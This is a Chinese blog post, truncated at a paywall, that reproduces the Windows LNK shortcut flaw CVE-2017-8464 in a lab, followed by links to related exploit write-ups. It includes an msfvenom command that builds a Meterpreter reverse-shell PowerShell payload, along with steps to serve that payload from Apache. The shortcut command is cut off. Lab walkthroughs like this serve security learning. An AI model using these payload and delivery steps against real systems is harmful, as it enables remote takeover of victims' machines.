MSF之CVE-2017-8464远程命令执行漏洞复现

最新推荐文章于 2024-08-09 19:37:26 发布
最新推荐文章于 2024-08-09 19:37:26 发布
阅读量3.2k 收藏 15
点赞数 6
分类专栏: 渗透 文章标签: CVE-2017-8464
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42280544/article/details/84720758
版权
本文档详细介绍了如何复现CVE-2017-8464漏洞,利用Kali Linux上的msfconsole工具生成payload,并通过Apache服务器将恶意powershell脚本传送给Windows 2008目标系统,最终实现远程命令执行和权限提升。
摘要由CSDN通过智能技术生成

MSF之CVE-2017-8464远程命令执行漏洞复现

准备

实验准备环境:
被攻击机:虚拟机win2008x64位系统,其IP为:192.168.1.107
攻击机:kali系统,其IP为:192.168.1.111
攻击工具:kali自带的msfconsole工具

漏洞利用

在kali终端中输入msfconsole

cd 下载/
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.111 lport=4444 -f psh-reflection>hack.ps1

在这里插入图片描述

  1. 将文件拷贝进入/var/www/html
    mv hack.ps1 /var/www/html
  2. 开启apache
    service apache2 start
  3. 访问Apache的hacjk.ps1,显示文件页面

在这里插入图片描述

  1. 在靶机上创建powershell远程快捷方式
    powershell -windowstyl
最低0.47元/天 解锁文章
TzerQ
关注
专栏目录
复现CVE-2017-7269(IIS6.0远程代码执行)漏洞
记录并分享学习安全的知识点..
03-03 1930
前言: 今天小编挖到了一个高危漏洞,打进去以后,给的用户权限太低了,尝试了好久的提权。虽然最后没提权成功,起码也攻进去了,也是可看见系统盘所有目录下所有的关键资料,整理报告完成了也索性就记录一下趴! 警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保。 一、漏洞介绍 Windows Server 2003R2版本IIS6.0的WebDAV服务中的ScStoragePathFromUrl函数存在缓存区溢出漏洞远程攻击者通过以“If: <http://”开头的长header PRO
CVE-2017-8464复现
qq_41772873的博客
03-02 1106
前言 CVE-2017-8464又称远程快捷方式漏洞 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。 注释:.LNK是用于指向其他文件的一种文件,这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用...
CVE-2017-8464远程命令执行漏洞(震网漏洞复现
kuiguowei的博客
01-16 1892
2017年6月13日,微软官方发布编号为CVE-2017-8464漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。 漏洞描述 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户在Windows资源管理器或解析.LNK文件的任何
CVE-2017-8464 “震网三代“ 漏洞复现
最新发布
cxm4545的博客
08-09 386
2017年6月13日,微软官方发布编号为 CVE-2017-8464漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统。传播的载体一般是LNK ,LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。被攻击机插入存在攻击lnk的U盘后会反弹shell,哪怕是被隔离的内网,也可以在不上网的情况下被攻击。
CVE-2017-8464漏洞复现
我的学习笔记
02-28 1146
感谢学长分享复现的技术文档,十分感谢。在线免费实验:http://www.hetianlab.com/expc.do?ec=ECIDee9320adea6e0620170831142939000011、资源:http://www.phpstudy.net/a.php/211.html2、本次测试使用了win10和kali最新版。下载安装phpstudy到...
CVE-2017-8464复现(震网三代)
小赵同学的博客
01-17 443
CVE-2017-8464复现(震网三代) 影响版本 windows 10 windwos RT 8.1 windows 8.1 windows 7 windows server 2016 windows server 2012 R2 windows server 2012 windows server 2008 R2 windows server 2008 1. 漏洞利用复现 环境: 攻击机kali:192.168.228.128 靶机window10 192.168.228.129 Kali终端输入
[CVE-2017-8464]Microsoft Windows远程命令执行漏洞复现
weixin_30237719的博客
06-16 283
版权声明:本文为博主的原创文章,未经博主同意不得转载 前言 记录下自己的复现,保留意见 2017年6月13日,微软官方发布编号为CVE-2017-8464漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,分别存在于LNK文件和Windows Search功能中。黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危 概述 微软的...
CVE-2017-8464远程命令执行漏洞复现
m0_48520508的博客
01-13 296
0x00漏洞概述 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。注:.LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。 Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用.
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
漏洞复现】Samba 远程命令执行CVE-2017-7494)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-13 1419
2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。属于严重漏洞,可以造成远程代码执行。Samba实现Windows主机与Linux服务器之间的资源共享,Linux操作系统提供了Samba服务,Samba服务为两种不同的操作系统架起了一座桥梁,使Linux系统和Windows系统之间能够实现互相通信。...
CVE-2017-8464 LNK文件(快捷方式)远程代码执行漏洞复现
aijuzhou1959的博客
07-25 315
北京时间2017年6月13日凌晨,微软官方发布6月安全补丁程序,“震网三代” LNK文件远程代码执行漏洞CVE-2017-8464)和Windows搜索远程命令执行漏洞CVE-2017-8543). CVE-2017-8543,当Windows搜索处理内存中的对象时,存在远程执行代码漏洞。成功利用此漏洞的攻击者可以控制受影响的系统。 CVE-2017-8464,当Windows系...
[Shell]CVE-2017-8464漏洞复现
baguangman5501的博客
09-01 331
0x01 漏洞原理 Windows系统通过解析 .LNK 后缀文件时,是使用二进制来解析的,而当恶意的二进制代码被系统识别执行的时候就可以实现远程代码执行,由于是在explorer.exe进程中运行的,所以load进内存的时候与当前用户具有相同的权限。 于是攻击者利用这一解析过程的漏洞,将包含恶意二进制的代码被附带进可移动驱动器(或远程共享过程中),受害者使用powershell解析 ....
CVE-2017-8464(远程执行命令)漏洞复现
RongChun的博客
01-04 1073
漏洞复现: 利用原理: 创建恶意快捷方式,包含恶意执行脚本,点击恶意快捷方式,导致本机中病毒。 漏洞影响范围: • Microsoft Windows 10 Version 1607 for 32-bit Systems • Microsoft Windows 10 Version 1607 for x64-based Systems • Microsoft Windows 10 for 32-b...
winCVE-2017-8464漏洞复现
weixin_44664530的博客
04-27 251
影响版本 windows 10 windwos RT 8.1 windows 8.1 windows 7 windows server 2016 windows server 2012 R2 windows server 2012 windows server 2008 R2 windows server 2008 复现 需下载工具https://github.com/rapid7/metaspl...
CVE-2017-8464 分析
weixin_30814319的博客
12-28 872
目录 CVE-2017-8464(stuxnet 3.0) 分析 0xFF 前言 0x00 分析工具 0x01 漏洞复现 1)、生成一个DLL用于测试 2)、构造一个恶意的lnk二进制文件 3)、RUA! ...
【研究】震网三代漏洞
weixin_30414155的博客
08-29 268
一、 CVE-2017-8464远程命令执行漏洞(震网三代漏洞复现 漏洞描述: 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。当用户在Windows资源管理器或解析.LNK文件 的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同 的用户权限。 注释:...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值